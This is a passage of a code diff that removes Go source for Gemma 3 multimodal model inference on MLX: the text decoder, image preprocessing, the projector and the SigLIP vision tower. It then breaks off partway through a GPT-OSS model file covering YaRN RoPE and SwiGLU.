// Pattern N means: layers 0 to N-1 sliding, N full, N+1 to 2N-1 sliding, 2N full, etc.
func isLayerSliding(layerIdx, pattern int32) bool {
if pattern <= 0 {
return false // No sliding window
}
// Layer is full attention if (layerIdx + 1) % pattern == 0
return (layerIdx+1)%pattern != 0
}
// Forward runs the text model forward pass
func (m *TextModel) Forward(tokens *mlx.Array, caches []cache.Cache) *mlx.Array {
B, L := tokens.Shape()[0], tokens.Shape()[1]
// Get embeddings and scale by sqrt(hidden_size)
h := m.EmbedTokens.Forward(tokens)
h = mlx.MulScalar(h, float32(math.Sqrt(float64(m.HiddenSize))))
for i, layer := range m.Layers {
h = layer.Forward(h, caches[i], B, L, m.TextConfig)
}
// Final norm and output projection
return m.Output.Forward(mlx.RMSNorm(h, m.NormScaled, m.RMSNormEps))
}
// Forward runs a decoder layer
func (l *DecoderLayer) Forward(x *mlx.Array, c cache.Cache, B, L int32, cfg *TextConfig) *mlx.Array {
// Pre-attention norm (use precomputed scaled weight)
normed := mlx.RMSNorm(x, l.InputNormScaled, cfg.RMSNormEps)
// Attention
attnOut := l.Attention.Forward(normed, c, B, L, l.IsSliding, cfg)
// Post-attention norm and residual
attnOut = mlx.RMSNorm(attnOut, l.PostAttnNormScaled, cfg.RMSNormEps)
h := mlx.Add(x, attnOut)
// Pre-FFN norm
normed = mlx.RMSNorm(h, l.PreFFNormScaled, cfg.RMSNormEps)
// MLP
mlpOut := l.MLP.Forward(normed)
// Post-FFN norm and residual
mlpOut = mlx.RMSNorm(mlpOut, l.PostFFNormScaled, cfg.RMSNormEps)
return mlx.Add(h, mlpOut)
}
// Forward runs attention with Q/K normalization
func (a *Attention) Forward(x *mlx.Array, c cache.Cache, B, L int32, isSliding bool, cfg *TextConfig) *mlx.Array {
q := a.QProj.Forward(x)
k := a.KProj.Forward(x)
v := a.VProj.Forward(x)
// Reshape to [B, num_heads, L, head_dim]
q = mlx.AsStrided(q, []int32{B, cfg.NumAttentionHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumAttentionHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumAttentionHeads * cfg.HeadDim), 1}, 0)
k = mlx.AsStrided(k, []int32{B, cfg.NumKeyValueHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumKeyValueHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumKeyValueHeads * cfg.HeadDim), 1}, 0)
v = mlx.AsStrided(v, []int32{B, cfg.NumKeyValueHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumKeyValueHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumKeyValueHeads * cfg.HeadDim), 1}, 0)
// Q/K normalization after reshaping (use precomputed scaled weight)
q = mlx.RMSNorm(q, a.QNormScaled, cfg.RMSNormEps)
k = mlx.RMSNorm(k, a.KNormScaled, cfg.RMSNormEps)
// Apply RoPE with appropriate theta
ropeTheta := cfg.RopeTheta
if isSliding {
ropeTheta = cfg.RopeLocalBaseFreq
}
q = mlx.RoPE(q, int(cfg.HeadDim), false, ropeTheta, 1.0, c.Offset())
k = mlx.RoPE(k, int(cfg.HeadDim), false, ropeTheta, 1.0, c.Offset())
// Update cache
k, v = c.Update(k, v, int(L))
// Repeat K/V for GQA if needed
repeatFactor := cfg.NumAttentionHeads / cfg.NumKeyValueHeads
if repeatFactor > 1 {
k = nn.RepeatKV(k, repeatFactor)
v = nn.RepeatKV(v, repeatFactor)
}
// Attention
out := mlx.ScaledDotProductAttention(q, k, v, cfg.Scale, L > 1)
out = mlx.Reshape(mlx.Transpose(out, 0, 2, 1, 3), B, L, cfg.NumAttentionHeads*cfg.HeadDim)
return a.OProj.Forward(out)
}
// compiledGeluApprox is a singleton compiled GELU function shared across all layers
var compiledGeluApprox *mlx.CompiledFunc
// getCompiledGeluApprox returns the compiled GELU function, creating it once if needed
func getCompiledGeluApprox() *mlx.CompiledFunc {
if compiledGeluApprox == nil {
compiledGeluApprox = mlx.CompileShapeless(func(inputs []*mlx.Array) []*mlx.Array {
return []*mlx.Array{geluApproxImpl(inputs[0])}
}, true)
}
return compiledGeluApprox
}
// Forward runs the MLP with GELU approximation (tanh variant)
func (m *MLP) Forward(x *mlx.Array) *mlx.Array {
gate := getCompiledGeluApprox().Call(m.GateProj.Forward(x))[0]
return m.DownProj.Forward(mlx.Mul(gate, m.UpProj.Forward(x)))
}
// geluApproxImpl computes GELU using the tanh approximation (gelu_pytorch_tanh):
// 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x^3)))
func geluApproxImpl(x *mlx.Array) *mlx.Array {
// Constants
const sqrt2OverPi = 0.7978845608028654 // sqrt(2/pi)
const coeff = 0.044715
// x^3
x3 := mlx.Mul(mlx.Mul(x, x), x)
// x + 0.044715 * x^3
inner := mlx.Add(x, mlx.MulScalar(x3, coeff))
// sqrt(2/pi) * (x + 0.044715 * x^3)
scaled := mlx.MulScalar(inner, sqrt2OverPi)
// tanh(...)
tanh := mlx.Tanh(scaled)
// 1 + tanh(...)
onePlusTanh := mlx.AddScalar(tanh, 1.0)
// 0.5 * x * (1 + tanh(...))
return mlx.Mul(mlx.MulScalar(x, 0.5), onePlusTanh)
}
// gemmaRMSNorm applies Gemma-style RMS normalization: x * rsqrt(mean(x^2) + eps) * (1 + weight)
// Uses mlx.RMSNorm fast kernel with pre-computed (1 + weight)
func gemmaRMSNorm(x, weight *mlx.Array, eps float32) *mlx.Array {
// Gemma uses (1 + weight) instead of weight
scaledWeight := mlx.AddScalar(weight, 1.0)
return mlx.RMSNorm(x, scaledWeight, eps)
}
// Interface methods
func (m *TextModel) NumLayers() int { return len(m.Layers) }
func (m *TextModel) MaxContextLength() int32 { return m.MaxPositionEmbeddings }
func (m *TextModel) VocabSize() int32 { return m.TextConfig.VocabSize }
// Tokenizer returns the tokenizer wrapped to add BOS and apply chat template
func (m *TextModel) Tokenizer() *tokenizer.Tokenizer {
return m.tok
}
// FormatPrompt applies the Gemma 3 chat template to a prompt
func (m *TextModel) FormatPrompt(prompt string) string {
// Gemma 3 chat format: <start_of_turn>user\n{prompt}<end_of_turn>\n<start_of_turn>model\n
return fmt.Sprintf("<start_of_turn>user\n%s<end_of_turn>\n<start_of_turn>model\n", prompt)
}
func (m *TextModel) NewCache(maxSeqLen int32) []cache.Cache {
caches := make([]cache.Cache, len(m.Layers))
for i := range caches {
if m.Layers[i].IsSliding {
// Use rotating cache for sliding window layers
caches[i] = cache.NewRotatingKVCache(int(m.SlidingWindow))
} else {
// Use regular cache for global attention layers
caches[i] = cache.NewKVCache()
}
}
return caches
}
// Config holds config for the full multimodal model
type Config struct {
TextConfig TextConfig `json:"text_config"`
VisionConfig VisionConfig `json:"vision_config"`
// Image token config (from config.json)
BOITokenIndex int32 `json:"boi_token_index"` // <start_of_image> = 255999
EOITokenIndex int32 `json:"eoi_token_index"` // <end_of_image> = 256000
ImageTokenIndex int32 `json:"image_token_index"` // <image_soft_token> = 262144
MMTokensPerImage int32 `json:"mm_tokens_per_image"` // 256
}
// Model is the full Gemma 3 multimodal model
type Model struct {
VisionTower *VisionTower `weight:"vision_tower"`
Projector *MultiModalProjector `weight:"multi_modal_projector"`
TextModel *TextModel `weight:"language_model"`
Config *Config
tok *tokenizer.Tokenizer
}
// Load loads the full multimodal Gemma 3 model
func Load(modelPath string) (*Model, error) {
data, err := os.ReadFile(filepath.Join(modelPath, "config.json"))
if err != nil {
return nil, fmt.Errorf("load config: %w", err)
}
var cfg Config
if err := json.Unmarshal(data, &cfg); err != nil {
return nil, fmt.Errorf("parse config: %w", err)
}
// Set defaults for text config (multimodal config often has incomplete text_config)
// These defaults match transformers.Gemma3TextConfig defaults
tc := &cfg.TextConfig
if tc.HeadDim == 0 {
tc.HeadDim = 256 // Gemma 3 uses head_dim=256
}
if tc.NumAttentionHeads == 0 {
// Gemma 3 4B uses 8 attention heads (cannot infer from hidden_size/head_dim)
tc.NumAttentionHeads = 8
}
if tc.NumKeyValueHeads == 0 {
// Gemma 3 4B uses 4 KV heads (GQA with 2:1 ratio)
tc.NumKeyValueHeads = 4
}
if tc.VocabSize == 0 {
tc.VocabSize = 262208 // Gemma 3 vocab size (not 262144!)
}
if tc.RopeTheta == 0 {
tc.RopeTheta = 1000000
}
if tc.RopeLocalBaseFreq == 0 {
tc.RopeLocalBaseFreq = 10000
}
if tc.RMSNormEps == 0 {
tc.RMSNormEps = 1e-6
}
if tc.SlidingWindowPattern == 0 {
tc.SlidingWindowPattern = 6
}
if tc.MaxPositionEmbeddings == 0 {
tc.MaxPositionEmbeddings = 131072 // Gemma 3 4B default
}
// Compute text model scale
tc.Scale = float32(1.0 / math.Sqrt(float64(tc.HeadDim)))
// Set defaults for image token config
if cfg.BOITokenIndex == 0 {
cfg.BOITokenIndex = 255999 // <start_of_image>
}
if cfg.EOITokenIndex == 0 {
cfg.EOITokenIndex = 256000 // <end_of_image>
}
if cfg.ImageTokenIndex == 0 {
cfg.ImageTokenIndex = 262144 // <image_soft_token>
}
if cfg.MMTokensPerImage == 0 {
cfg.MMTokensPerImage = 256
}
weights, err := safetensors.LoadModelWeights(modelPath)
if err != nil {
return nil, fmt.Errorf("load weights: %w", err)
}
tok, err := tokenizer.Load(filepath.Join(modelPath, "tokenizer.json"))
if err != nil {
return nil, fmt.Errorf("load tokenizer: %w", err)
}
m := &Model{
VisionTower: &VisionTower{
Embeddings: &VisionEmbeddings{},
Encoder: make([]*VisionEncoderLayer, cfg.VisionConfig.NumHiddenLayers),
Config: &cfg.VisionConfig,
},
Projector: &MultiModalProjector{},
TextModel: &TextModel{
Layers: make([]*DecoderLayer, cfg.TextConfig.NumHiddenLayers),
TextConfig: &cfg.TextConfig,
},
Config: &cfg,
tok: tok,
}
// Initialize text layer metadata
for i := range m.TextModel.Layers {
m.TextModel.Layers[i] = &DecoderLayer{
LayerIdx: int32(i),
IsSliding: isLayerSliding(int32(i), cfg.TextConfig.SlidingWindowPattern),
}
}
// Initialize vision encoder layers
for i := range m.VisionTower.Encoder {
m.VisionTower.Encoder[i] = &VisionEncoderLayer{}
}
if err := safetensors.LoadModule(m, weights, ""); err != nil {
return nil, err
}
// Tied embeddings for text output
m.TextModel.Output = nn.NewLinear(m.TextModel.EmbedTokens.Weight, nil)
m.TextModel.tok = tok
mlx.Eval(mlx.Collect(m)...)
weights.ReleaseAll()
// Precompute (1 + weight) for Gemma-style RMSNorm
precomputeGemmaScaledWeights(m.TextModel)
// Precompute projector's scaled weight
m.Projector.SoftEmbNormScaled = mlx.AddScalar(m.Projector.SoftEmbNorm.Weight, 1.0)
mlx.Eval(m.Projector.SoftEmbNormScaled)
return m, nil
}
// Forward runs the text-only forward pass
func (m *Model) Forward(tokens *mlx.Array, caches []cache.Cache) *mlx.Array {
return m.TextModel.Forward(tokens, caches)
}
// ForwardWithImage runs the multimodal forward pass
// tokens: [B, L] input token IDs (with image placeholder tokens)
// image: [B, H, W, C] preprocessed image tensor
func (m *Model) ForwardWithImage(tokens *mlx.Array, image *mlx.Array, caches []cache.Cache) *mlx.Array {
B, L := tokens.Shape()[0], tokens.Shape()[1]
cfg := m.Config.TextConfig
// Find image token position FIRST before any eval that might free tokens
imageStartPos := int32(-1)
if image != nil && B == 1 {
tokenData := tokens.DataInt32() // This evals tokens
for i, t := range tokenData {
if t == m.Config.ImageTokenIndex {
imageStartPos = int32(i)
break
}
}
}
// Get text embeddings and scale
h := m.TextModel.EmbedTokens.Forward(tokens)
h = mlx.MulScalar(h, float32(math.Sqrt(float64(cfg.HiddenSize))))
// Process image if provided
if image != nil && imageStartPos >= 0 {
// Vision tower: [B, H, W, C] -> [B, num_patches, vision_hidden]
visionFeatures := m.VisionTower.Forward(image)
// Project to text space: [B, num_patches, vision_hidden] -> [B, 256, text_hidden]
imageEmbeds := m.Projector.Forward(visionFeatures, cfg.RMSNormEps)
// Eval h and imageEmbeds together so neither gets freed
mlx.Eval(h, imageEmbeds)
// Cast imageEmbeds to match text embeddings dtype (bf16)
if imageEmbeds.Dtype() != h.Dtype() {
imageEmbeds = mlx.AsType(imageEmbeds, h.Dtype())
mlx.Eval(imageEmbeds)
}
// Insert image embeddings at the known position
h = m.insertImageEmbeddingsAt(h, imageEmbeds, imageStartPos)
}
// Run through text model layers
for i, layer := range m.TextModel.Layers {
h = layer.Forward(h, caches[i], B, L, m.TextModel.TextConfig)
}
// Final norm and output projection
return m.TextModel.Output.Forward(mlx.RMSNorm(h, m.TextModel.NormScaled, cfg.RMSNormEps))
}
// insertImageEmbeddingsAt replaces image placeholder tokens with actual image embeddings
// at a known position (to avoid re-scanning tokens after eval)
// textEmbeds: [B, L, hidden_size] text embeddings
// imageEmbeds: [B, 256, hidden_size] image embeddings from projector
// startPos: starting position of image tokens in the sequence
func (m *Model) insertImageEmbeddingsAt(textEmbeds, imageEmbeds *mlx.Array, startPos int32) *mlx.Array {
numImageTokens := imageEmbeds.Shape()[1]
L := textEmbeds.Shape()[1]
// Split text embeddings: [0:startPos] + imageEmbeds + [startPos+256:L]
afterStart := startPos + numImageTokens
// Slice before image tokens: textEmbeds[:, 0:startPos, :]
before := mlx.SliceAxis(textEmbeds, 1, 0, startPos)
// Slice after image tokens: textEmbeds[:, startPos+256:L, :]
after := mlx.SliceAxis(textEmbeds, 1, afterStart, L)
// Concatenate: before + imageEmbeds + after along axis 1
return mlx.Concatenate([]*mlx.Array{before, imageEmbeds, after}, 1)
}
// Interface methods for Model
func (m *Model) NumLayers() int { return len(m.TextModel.Layers) }
func (m *Model) MaxContextLength() int32 { return m.Config.TextConfig.MaxPositionEmbeddings }
func (m *Model) VocabSize() int32 { return m.Config.TextConfig.VocabSize }
func (m *Model) Tokenizer() *tokenizer.Tokenizer { return m.tok }
func (m *Model) NewCache(maxSeqLen int32) []cache.Cache { return m.TextModel.NewCache(maxSeqLen) }
func (m *Model) ImageSize() int32 { return m.Config.VisionConfig.ImageSize }
// FormatPrompt applies the Gemma 3 multimodal chat template
func (m *Model) FormatPrompt(prompt string) string {
return fmt.Sprintf("<start_of_turn>user\n%s<end_of_turn>\n<start_of_turn>model\n", prompt)
}
// FormatPromptWithImage applies the Gemma 3 multimodal chat template with image
func (m *Model) FormatPromptWithImage(prompt string) string {
return fmt.Sprintf("<start_of_turn>user\n<start_of_image>%s<end_of_turn>\n<start_of_turn>model\n", prompt)
}
// ExpandImageTokens expands <start_of_image> into 256 image placeholder tokens
// Input tokens containing boi_token (255999) are expanded to:
// boi_token + 256 * image_token + eoi_token
func (m *Model) ExpandImageTokens(tokens []int32) []int32 {
result := make([]int32, 0, len(tokens)+int(m.Config.MMTokensPerImage)+1)
for _, t := range tokens {
if t == m.Config.BOITokenIndex {
// Expand: boi + 256 * image_token + eoi
result = append(result, m.Config.BOITokenIndex)
for i := int32(0); i < m.Config.MMTokensPerImage; i++ {
result = append(result, m.Config.ImageTokenIndex)
}
result = append(result, m.Config.EOITokenIndex)
} else {
result = append(result, t)
}
}
return result
}

View File

@@ -1,58 +0,0 @@
//go:build mlx
package gemma3
import (
"fmt"
"image"
_ "image/jpeg"
_ "image/png"
"os"
"github.com/ollama/ollama/x/imagegen/mlx"
"golang.org/x/image/draw"
)
// ProcessImage loads and preprocesses an image for the vision tower
// Returns [1, H, W, C] tensor in NHWC format normalized for SigLIP
func ProcessImage(path string, imageSize int32) (*mlx.Array, error) {
f, err := os.Open(path)
if err != nil {
return nil, fmt.Errorf("open image: %w", err)
}
defer f.Close()
img, _, err := image.Decode(f)
if err != nil {
return nil, fmt.Errorf("decode image: %w", err)
}
return ProcessImageData(img, imageSize)
}
// ProcessImageData preprocesses an image.Image for the vision tower
func ProcessImageData(img image.Image, imageSize int32) (*mlx.Array, error) {
// Resize to target size using bilinear interpolation
resized := image.NewRGBA(image.Rect(0, 0, int(imageSize), int(imageSize)))
draw.BiLinear.Scale(resized, resized.Bounds(), img, img.Bounds(), draw.Over, nil)
// Convert to float32 array [H, W, C] and normalize
// SigLIP normalization: (pixel / 255.0 - 0.5) / 0.5 = pixel / 127.5 - 1.0
data := make([]float32, imageSize*imageSize*3)
idx := 0
for y := int32(0); y < imageSize; y++ {
for x := int32(0); x < imageSize; x++ {
r, g, b, _ := resized.At(int(x), int(y)).RGBA()
// RGBA returns 16-bit values, convert to 8-bit
data[idx] = float32(r>>8)/127.5 - 1.0
data[idx+1] = float32(g>>8)/127.5 - 1.0
data[idx+2] = float32(b>>8)/127.5 - 1.0
idx += 3
}
}
// Create MLX array [1, H, W, C] for NHWC layout
arr := mlx.NewArrayFloat32(data, []int32{1, imageSize, imageSize, 3})
mlx.Eval(arr) // Materialize to prevent use-after-free
return arr, nil
}

View File

@@ -1,50 +0,0 @@
//go:build mlx
package gemma3
import (
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
)
// MultiModalProjector projects vision features to text embedding space
type MultiModalProjector struct {
// mm_input_projection_weight: [vision_hidden, text_hidden]
InputProjection *mlx.Array `weight:"mm_input_projection_weight"`
SoftEmbNorm *nn.RMSNorm `weight:"mm_soft_emb_norm"`
// Precomputed (1 + weight) for Gemma-style RMSNorm
SoftEmbNormScaled *mlx.Array `weight:"-"`
}
// Forward projects vision features to text space
// Input: [B, num_patches, vision_hidden] (e.g., [1, 4096, 1152])
// Output: [B, num_image_tokens, text_hidden] (e.g., [1, 256, 2560])
func (p *MultiModalProjector) Forward(visionFeatures *mlx.Array, eps float32) *mlx.Array {
// Average pool 4x4: [B, 4096, 1152] -> [B, 256, 1152]
// 4096 patches = 64x64 grid, pool to 16x16 = 256 tokens
B := visionFeatures.Shape()[0]
visionHidden := visionFeatures.Shape()[2]
// Reshape to [B, 64, 64, hidden]
gridSize := int32(64) // sqrt(4096)
pooledSize := int32(16) // 64/4
h := mlx.Reshape(visionFeatures, B, gridSize, gridSize, visionHidden)
// Reshape to [B, 16, 4, 16, 4, hidden] for 4x4 pooling
h = mlx.Reshape(h, B, pooledSize, 4, pooledSize, 4, visionHidden)
// Average over pooling dimensions (axes 2 and 4)
h = mlx.Mean(h, 4, false)
h = mlx.Mean(h, 2, false)
// h is now [B, 16, 16, hidden], reshape to [B, 256, hidden]
numTokens := pooledSize * pooledSize
h = mlx.Reshape(h, B, numTokens, visionHidden)
// Apply Gemma-style RMS norm (use precomputed 1 + weight)
h = mlx.RMSNorm(h, p.SoftEmbNormScaled, eps)
// Project to text space: [B, 256, vision_hidden] @ [vision_hidden, text_hidden]
return mlx.Linear(h, p.InputProjection)
}

View File

@@ -1,138 +0,0 @@
//go:build mlx
package gemma3
import (
"math"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
)
// VisionConfig holds configuration for the SigLIP vision tower
type VisionConfig struct {
HiddenSize int32 `json:"hidden_size"`
ImageSize int32 `json:"image_size"`
IntermediateSize int32 `json:"intermediate_size"`
NumAttentionHeads int32 `json:"num_attention_heads"`
NumHiddenLayers int32 `json:"num_hidden_layers"`
PatchSize int32 `json:"patch_size"`
}
// VisionTower is the SigLIP vision encoder
type VisionTower struct {
Embeddings *VisionEmbeddings `weight:"vision_model.embeddings"`
Encoder []*VisionEncoderLayer `weight:"vision_model.encoder.layers"`
PostLayerNorm *nn.LayerNorm `weight:"vision_model.post_layernorm"`
Config *VisionConfig
}
// VisionEmbeddings handles patch and position embeddings
type VisionEmbeddings struct {
// PatchWeight: [O, C, kH, kW] from PyTorch, transposed to [O, kH, kW, C] for MLX
PatchWeight *mlx.Array `weight:"patch_embedding.weight"`
PatchBias *mlx.Array `weight:"patch_embedding.bias"`
PosEmbed *nn.Embedding `weight:"position_embedding"`
}
// VisionEncoderLayer is a single transformer encoder layer
type VisionEncoderLayer struct {
LayerNorm1 *nn.LayerNorm `weight:"layer_norm1"`
Attention *VisionAttention `weight:"self_attn"`
LayerNorm2 *nn.LayerNorm `weight:"layer_norm2"`
MLP *VisionMLP `weight:"mlp"`
}
// VisionAttention implements multi-head self-attention
type VisionAttention struct {
QProj *nn.Linear `weight:"q_proj"`
KProj *nn.Linear `weight:"k_proj"`
VProj *nn.Linear `weight:"v_proj"`
OutProj *nn.Linear `weight:"out_proj"`
}
// VisionMLP is the feed-forward network
type VisionMLP struct {
FC1 *nn.Linear `weight:"fc1"`
FC2 *nn.Linear `weight:"fc2"`
}
// Forward runs the vision tower on preprocessed images
// Input: [B, H, W, C] normalized image tensor (NHWC layout for MLX)
// Output: [B, num_patches, hidden_size]
func (v *VisionTower) Forward(x *mlx.Array) *mlx.Array {
// Patch embedding conv: input [B, H, W, C], weight [O, kH, kW, C] -> [B, grid, grid, O]
// Weight comes as [O, C, kH, kW] from PyTorch, transpose to [O, kH, kW, C]
weight := mlx.Transpose(v.Embeddings.PatchWeight, 0, 2, 3, 1)
h := mlx.Conv2d(x, weight, v.Config.PatchSize, 0) // stride=patch_size, no padding
// Add bias: [O] -> [1, 1, 1, O] for broadcasting
bias := mlx.Reshape(v.Embeddings.PatchBias, 1, 1, 1, v.Embeddings.PatchBias.Shape()[0])
h = mlx.Add(h, bias)
// h is [B, grid, grid, hidden], flatten to [B, num_patches, hidden]
B := h.Shape()[0]
gridH, gridW := h.Shape()[1], h.Shape()[2]
hidden := h.Shape()[3]
numPatches := gridH * gridW
h = mlx.Reshape(h, B, numPatches, hidden)
// Add position embeddings
posIds := mlx.ArangeInt(0, numPatches, 1, mlx.DtypeInt32)
posEmbed := v.Embeddings.PosEmbed.Forward(posIds)
h = mlx.Add(h, posEmbed)
// Encoder layers
headDim := float32(v.Config.HiddenSize / v.Config.NumAttentionHeads)
scale := float32(1.0 / math.Sqrt(float64(headDim)))
for _, layer := range v.Encoder {
h = layer.Forward(h, v.Config, scale)
}
// Final layer norm
h = v.PostLayerNorm.Forward(h)
return h
}
// Forward runs a vision encoder layer
func (l *VisionEncoderLayer) Forward(x *mlx.Array, cfg *VisionConfig, scale float32) *mlx.Array {
// Pre-norm attention
h := l.LayerNorm1.Forward(x)
h = l.Attention.Forward(h, cfg, scale)
x = mlx.Add(x, h)
// Pre-norm MLP
h = l.LayerNorm2.Forward(x)
h = l.MLP.Forward(h)
return mlx.Add(x, h)
}
// Forward runs multi-head self-attention
func (a *VisionAttention) Forward(x *mlx.Array, cfg *VisionConfig, scale float32) *mlx.Array {
B, L := x.Shape()[0], x.Shape()[1]
headDim := cfg.HiddenSize / cfg.NumAttentionHeads
q := a.QProj.Forward(x)
k := a.KProj.Forward(x)
v := a.VProj.Forward(x)
// Reshape to [B, num_heads, L, head_dim]
q = mlx.Transpose(mlx.Reshape(q, B, L, cfg.NumAttentionHeads, headDim), 0, 2, 1, 3)
k = mlx.Transpose(mlx.Reshape(k, B, L, cfg.NumAttentionHeads, headDim), 0, 2, 1, 3)
v = mlx.Transpose(mlx.Reshape(v, B, L, cfg.NumAttentionHeads, headDim), 0, 2, 1, 3)
// Scaled dot-product attention (no causal mask for vision)
out := mlx.ScaledDotProductAttention(q, k, v, scale, false)
// Reshape back: [B, num_heads, L, head_dim] -> [B, L, hidden]
out = mlx.Reshape(mlx.Transpose(out, 0, 2, 1, 3), B, L, cfg.HiddenSize)
return a.OutProj.Forward(out)
}
// Forward runs the MLP with GELU activation
func (m *VisionMLP) Forward(x *mlx.Array) *mlx.Array {
h := mlx.GELU(m.FC1.Forward(x))
return m.FC2.Forward(h)
}

View File

@@ -1,487 +0,0 @@
//go:build mlx
package gpt_oss
import (
"encoding/json"
"fmt"
"math"
"os"
"path/filepath"
"github.com/ollama/ollama/x/imagegen/cache"
"github.com/ollama/ollama/x/imagegen/mlx"
"github.com/ollama/ollama/x/imagegen/nn"
"github.com/ollama/ollama/x/imagegen/safetensors"
"github.com/ollama/ollama/x/imagegen/tokenizer"
)
// RopeScaling holds YaRN or other RoPE scaling configuration
type RopeScaling struct {
RopeType string `json:"rope_type"`
Factor float32 `json:"factor"`
OriginalMaxPositionEmbeddings int32 `json:"original_max_position_embeddings"`
BetaFast float32 `json:"beta_fast"`
BetaSlow float32 `json:"beta_slow"`
}
type Config struct {
HiddenSize int32 `json:"hidden_size"`
NumHiddenLayers int32 `json:"num_hidden_layers"`
IntermediateSize int32 `json:"intermediate_size"`
NumAttentionHeads int32 `json:"num_attention_heads"`
NumKeyValueHeads int32 `json:"num_key_value_heads"`
VocabSize int32 `json:"vocab_size"`
RMSNormEps float32 `json:"rms_norm_eps"`
RopeTheta float32 `json:"rope_theta"`
HeadDim int32 `json:"head_dim"`
SlidingWindow int32 `json:"sliding_window"`
NumLocalExperts int32 `json:"num_local_experts"`
NumExpertsPerTok int32 `json:"num_experts_per_tok"`
LayerTypes []string `json:"layer_types"`
SwiGLULimit float32 `json:"swiglu_limit"`
RopeScaling *RopeScaling `json:"rope_scaling"`
Scale float32 `json:"-"` // computed: 1/sqrt(HeadDim)
}
type Attention struct {
QProj *nn.Linear `weight:"self_attn.q_proj"`
KProj *nn.Linear `weight:"self_attn.k_proj"`
VProj *nn.Linear `weight:"self_attn.v_proj"`
OProj *nn.Linear `weight:"self_attn.o_proj"`
Sinks *mlx.Array `weight:"self_attn.sinks,optional"`
YarnFreqs *mlx.Array // computed
YarnMscale float32
}
// swiGLU applies the GPT-OSS custom SwiGLU activation.
// Formula: (gate * sigmoid(alpha * gate)) * (up + 1)
// with clipping: gate to [None, limit], up to [-limit, limit]
func swiGLU(gate, up *mlx.Array, alpha, limit float32) *mlx.Array {
// Clip gate to [None, limit]
gateClipped := mlx.ClipScalar(gate, 0, limit, false, true)
// Clip up to [-limit, limit]
upClipped := mlx.ClipScalar(up, -limit, limit, true, true)
// glu_scaled = alpha * gate_clipped
gluScaled := mlx.MulScalar(gateClipped, alpha)
// sig = sigmoid(glu_scaled)
sig := mlx.Sigmoid(gluScaled)
// out_glu = gate_clipped * sig
outGlu := mlx.Mul(gateClipped, sig)
// result = out_glu * (up_clipped + 1)
return mlx.Mul(outGlu, mlx.AddScalar(upClipped, 1.0))
}
// compiledSwiGLU is a singleton compiled SwiGLU function shared across all layers
var compiledSwiGLU *mlx.CompiledFunc
// getCompiledSwiGLU returns the compiled SwiGLU function, creating it once if needed
func getCompiledSwiGLU() *mlx.CompiledFunc {
if compiledSwiGLU == nil {
const alpha float32 = 1.702
const limit float32 = 7.0
compiledSwiGLU = mlx.CompileShapeless(func(inputs []*mlx.Array) []*mlx.Array {
return []*mlx.Array{swiGLU(inputs[0], inputs[1], alpha, limit)}
}, true) // shapeless=true so it works for any input size
}
return compiledSwiGLU
}
// ComputeYarnFreqs computes YaRN-modified RoPE frequencies
// Based on mlx-lm's YarnRoPE implementation
func ComputeYarnFreqs(dims int32, base, scalingFactor float32, origMaxPos int32, betaFast, betaSlow float32) (*mlx.Array, float32) {
// yarn_find_correction_dim
yarnFindCorrectionDim := func(numRotations float64) float64 {
return float64(dims) * math.Log(float64(origMaxPos)/(numRotations*2*math.Pi)) / (2 * math.Log(float64(base)))
}
// yarn_find_correction_range
low := int(math.Floor(yarnFindCorrectionDim(float64(betaFast))))
high := int(math.Ceil(yarnFindCorrectionDim(float64(betaSlow))))
if low < 0 {
low = 0
}
if high > int(dims)-1 {
high = int(dims) - 1
}
// yarn_get_mscale
yarnGetMscale := func(scale, mscale float64) float64 {
if scale <= 1 {
return 1.0
}
return 0.1*mscale*math.Log(scale) + 1.0
}
mscale := float32(yarnGetMscale(float64(scalingFactor), 1.0) / yarnGetMscale(float64(scalingFactor), 0.0))
// Compute frequencies
// freq_extra = base ** (arange(0, dims, 2) / dims)
// freq_inter = scaling_factor * freq_extra
halfDims := dims / 2
freqData := make([]float32, halfDims)
for i := int32(0); i < halfDims; i++ {
exp := float64(2*i) / float64(dims)
freqExtra := math.Pow(float64(base), exp)
freqInter := float64(scalingFactor) * freqExtra
// linear ramp mask
var freqMask float64
if low == high {
freqMask = 0.0
} else {
t := (float64(i) - float64(low)) / float64(high-low)
if t < 0 {
t = 0
}
if t > 1 {
t = 1
}
freqMask = 1.0 - t
}
// Combined frequency: (inter * extra) / (inter * mask + extra * (1 - mask))
freqData[i] = float32((freqInter * freqExtra) / (freqInter*freqMask + freqExtra*(1-freqMask)))
}
return mlx.NewArray(freqData, []int32{halfDims}), mscale
}
// initYarn initializes YaRN RoPE if configured
func (a *Attention) initYarn(cfg *Config) {
a.YarnMscale = 1.0
if cfg.RopeScaling != nil && cfg.RopeScaling.RopeType == "yarn" {
a.YarnFreqs, a.YarnMscale = ComputeYarnFreqs(
cfg.HeadDim,
cfg.RopeTheta,
cfg.RopeScaling.Factor,
cfg.RopeScaling.OriginalMaxPositionEmbeddings,
cfg.RopeScaling.BetaFast,
cfg.RopeScaling.BetaSlow,
)
}
}
func (a *Attention) Forward(x *mlx.Array, c cache.Cache, B, L int32, mask *mlx.Array, maskMode string, cfg *Config) *mlx.Array {
q := a.QProj.Forward(x)
k := a.KProj.Forward(x)
v := a.VProj.Forward(x)
// Reshape via AsStrided: [B, L, n_heads * head_dim] -> [B, n_heads, L, head_dim]
q = mlx.AsStrided(q, []int32{B, cfg.NumAttentionHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumAttentionHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumAttentionHeads * cfg.HeadDim), 1}, 0)
k = mlx.AsStrided(k, []int32{B, cfg.NumKeyValueHeads, L, cfg.HeadDim},
[]int64{int64(L * cfg.NumKeyValueHeads * cfg.HeadDim), int64(cfg.HeadDim), int64(cfg.NumKeyValueHeads * cfg.HeadDim), 1}, 0)
v = mlx.AsStrided(v, []int32{B, cfg.NumKeyValueHeads, L, cfg.HeadDim},
